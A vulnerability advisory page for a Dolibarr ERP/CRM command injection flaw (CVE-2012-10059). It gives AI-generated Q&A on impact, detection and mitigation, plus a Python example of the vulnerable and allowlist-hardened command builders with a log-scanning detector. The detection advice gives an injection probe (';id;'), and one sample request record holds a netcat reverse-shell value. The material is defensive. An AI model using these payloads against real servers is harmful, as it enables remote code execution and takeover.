CVE-2012-10059
BaseFortify

Publication date: 2025-08-13

Last updated on: 2025-08-14

Assigner: VulnCheck

Description
Dolibarr ERP/CRM versions <= 3.1.1 and <= 3.2.0 contain a post-authentication OS command injection vulnerability in the database backup feature. The export.php script fails to sanitize the sql_compat parameter, allowing authenticated users to inject arbitrary system commands into the backup command line and achieve remote code execution on the server.
Meta Information
Generated: 2026-05-06
AI Q&A generated: 2025-08-13
EPSS evaluated: 2026-05-05
References: NVD, EUVD
Affected Vendors & Products (2 associated CPEs)
Vendor    Product    Version
dolibarr  dolibarr   3.1.1
dolibarr  dolibarr   3.2.0
Note that the CPE entries name only the two ceiling versions; the description's "<= 3.1.1" and "<= 3.2.0" ranges cover the earlier releases on each branch as well.
CWE
CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'). The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.
AI Powered Q&A
Can you explain this vulnerability to me?

CVE-2012-10059 is a post-authentication OS command injection vulnerability in Dolibarr ERP/CRM versions up to and including 3.1.1 and 3.2.0. The export.php script behind the database backup feature (reached under admin/tools/) builds an operating system command from the sql_compat form parameter without sanitizing it, so an authenticated user who can reach that page can append shell metacharacters and additional commands to the value and have them executed on the server, which amounts to remote code execution. Valid credentials are required; the root cause is missing input validation in the backup export feature (CWE-78). [1, 2, 3, 4, 5]


How can this vulnerability impact me?

An authenticated attacker can execute arbitrary operating system commands on the affected server with the privileges of the web server user. That is enough to read sensitive data (including the application's configuration and database contents), modify or delete records, plant web shells or other persistence, disrupt service, and, combined with a local privilege escalation, take complete control of the underlying host. [1, 3, 4, 5]


How can this vulnerability be detected on my network or system? Can you suggest some commands?

Start with version inventory: any Dolibarr install at 3.1.1 or earlier, or at 3.2.0, that still exposes the backup tool at `/dolibarr/admin/tools/export.php` should be treated as vulnerable. To confirm actively, authenticate with valid Dolibarr credentials and send a POST request to `/dolibarr/admin/tools/export.php` with a payload appended to the `sql_compat` parameter, such as a semicolon followed by a harmless command (e.g., `;id;`), using curl or a similar tool; the Metasploit module (Resource 2) automates the login, session handling and payload delivery. Because the injected command runs server-side, confirm execution on the host rather than relying on the HTTP response (for example by having the test command create a file you can check, or by watching auditd or process accounting for an unexpected child process of the web server). Note that the parameter travels in the POST body, so ordinary web server access logs will not show it; request-body inspection (a WAF or audit log) or application-level logging is needed for retrospective detection. [2, 3, 4, 5]


What immediate steps should I take to mitigate this vulnerability?

Immediate mitigation steps:
1) Restrict access to the Dolibarr ERP/CRM application to trusted users only, since exploitation requires authentication; review which accounts can reach the admin tools.
2) Apply vendor-provided patches or upgrade past 3.1.1 and 3.2.0; according to the cited sources the vendor fixed the issue in the 3.2.x development branch by March 27, 2012, and planned fixes for 3.1.x by June 2012.
3) If patching is not immediately possible, disable or restrict access to the backup export feature (`export.php`), for example at the web server level.
4) Monitor for suspicious activity: unexpected values in the `sql_compat` parameter (anything other than a plain compatibility mode name) and unexpected child processes of the web server user.
5) Use a web application firewall or other network controls to block requests to `export.php` whose `sql_compat` value contains shell metacharacters; an allowlist of expected values is more robust than a blocklist of characters. [3, 4, 5]
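The mechanism behind the CWE-78 root cause described above and behind mitigation steps 4 and 5, as an added example that is not Dolibarr's code or taken from any cited resource: a Python model of the vulnerable command construction next to an allowlist-based hardened form, plus a detection pass over request records. Assumptions not stated on the page: that export.php concatenates sql_compat into a mysqldump command line as --compatible=<value> and runs it through a shell; that mysqldump's documented --compatible modes are the complete set of legitimate values; and the audit-record shape consumed by scan_records, which is constructed for this example. The vulnerable path is run with echo standing in for mysqldump so the demonstration is harmless.

```python
"""Added example (not Dolibarr's code): unsanitized sql_compat turning a
mysqldump invocation into arbitrary command execution (CWE-78), the allowlist
fix, and a detection pass over request records.

Assumptions: the vulnerable script concatenates sql_compat into a shell
command as --compatible=<value>; ALLOWED_COMPAT (mysqldump's documented
--compatible modes) is taken to be the full legitimate set; SAMPLE_RECORDS
and its field names are constructed for the example.
"""
import re
import shlex
import subprocess

# mysqldump's documented --compatible modes (assumed to be the legitimate set).
ALLOWED_COMPAT = {
    "ansi", "mysql323", "mysql40", "postgresql", "oracle", "mssql", "db2",
    "maxdb", "no_key_options", "no_table_options", "no_field_options",
}
# Characters that let a value escape a shell command line.
SHELL_META = re.compile(r"[;&|`$\n<>(){}\\]")


def is_valid_sql_compat(value: str) -> bool:
    """True only if value is a comma-separated list of allowlisted modes."""
    if not value:
        return False
    return all(part.strip().lower() in ALLOWED_COMPAT for part in value.split(","))


def build_dump_command_vulnerable(dumper: str, sql_compat: str) -> str:
    """The pattern behind CVE-2012-10059: raw concatenation into a string that
    is later handed to a shell (as PHP exec()/system() do)."""
    return f"{dumper} --compatible={sql_compat} dolibarr"


def build_dump_command_safe(dumper: str, sql_compat: str) -> list:
    """Hardened form: reject anything outside the allowlist and return an argv
    list for a no-shell invocation, so there is nothing left to inject into.
    If a shell string were unavoidable, shlex.quote(sql_compat) would be the
    second line of defence after the allowlist check."""
    if not is_valid_sql_compat(sql_compat):
        raise ValueError(f"rejected sql_compat value: {sql_compat!r}")
    return [dumper, f"--compatible={sql_compat}", "dolibarr"]


def run_vulnerable(sql_compat: str) -> str:
    """Run the vulnerable command through /bin/sh with `echo` standing in for
    mysqldump, and return stdout. An injected `;echo INJECTED;` shows up as
    its own output line because the shell splits the string into commands."""
    cmd = build_dump_command_vulnerable("echo", sql_compat)
    return subprocess.run(cmd, shell=True, capture_output=True, text=True).stdout


def flag_request(path: str, params: dict):
    """Detection rule for a WAF or audit-log review: return a reason string
    for export.php requests whose sql_compat is not a plain mode name, else
    None. The allowlist check catches attempts that avoid obvious metacharacters."""
    if not path.endswith("/admin/tools/export.php"):
        return None
    value = params.get("sql_compat")
    if value is None:
        return None
    if SHELL_META.search(value):
        return f"shell metacharacter in sql_compat: {value!r}"
    if not is_valid_sql_compat(value):
        return f"sql_compat outside allowlist: {value!r}"
    return None


def scan_records(records):
    """records: dicts with 'src', 'method', 'path', 'params' (constructed
    shape, e.g. from a request-body-logging proxy). Yields (src, reason)."""
    for rec in records:
        reason = flag_request(rec.get("path", ""), rec.get("params", {}))
        if reason:
            yield rec.get("src", "?"), reason


# Constructed sample records, not real traffic.
SAMPLE_RECORDS = [
    {"src": "10.0.0.5", "method": "POST", "path": "/dolibarr/admin/tools/export.php",
     "params": {"sql_compat": "ansi"}},
    {"src": "10.0.0.9", "method": "POST", "path": "/dolibarr/admin/tools/export.php",
     "params": {"sql_compat": ";id;"}},
    {"src": "10.0.0.7", "method": "GET", "path": "/dolibarr/index.php", "params": {}},
    {"src": "10.0.0.9", "method": "POST", "path": "/dolibarr/admin/tools/export.php",
     "params": {"sql_compat": "ansi|nc -e /bin/sh 10.0.0.9 4444"}},
]


def main():
    print("vulnerable builder output:\n" + run_vulnerable(";echo INJECTED;"))
    try:
        build_dump_command_safe("mysqldump", ";id;")
    except ValueError as exc:
        print("hardened builder:", exc)
    for src, reason in scan_records(SAMPLE_RECORDS):
        print(f"ALERT {src}: {reason}")


if __name__ == "__main__":
    main()
```

The allowlist is the important part: a metacharacter blocklist can be bypassed by whatever the blocklist author forgot, while a value that must be one of a dozen known mode names leaves no room for a payload at all. The same validator serves both the fix (reject before building the command) and the detection rule (alert on anything that would have been rejected).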

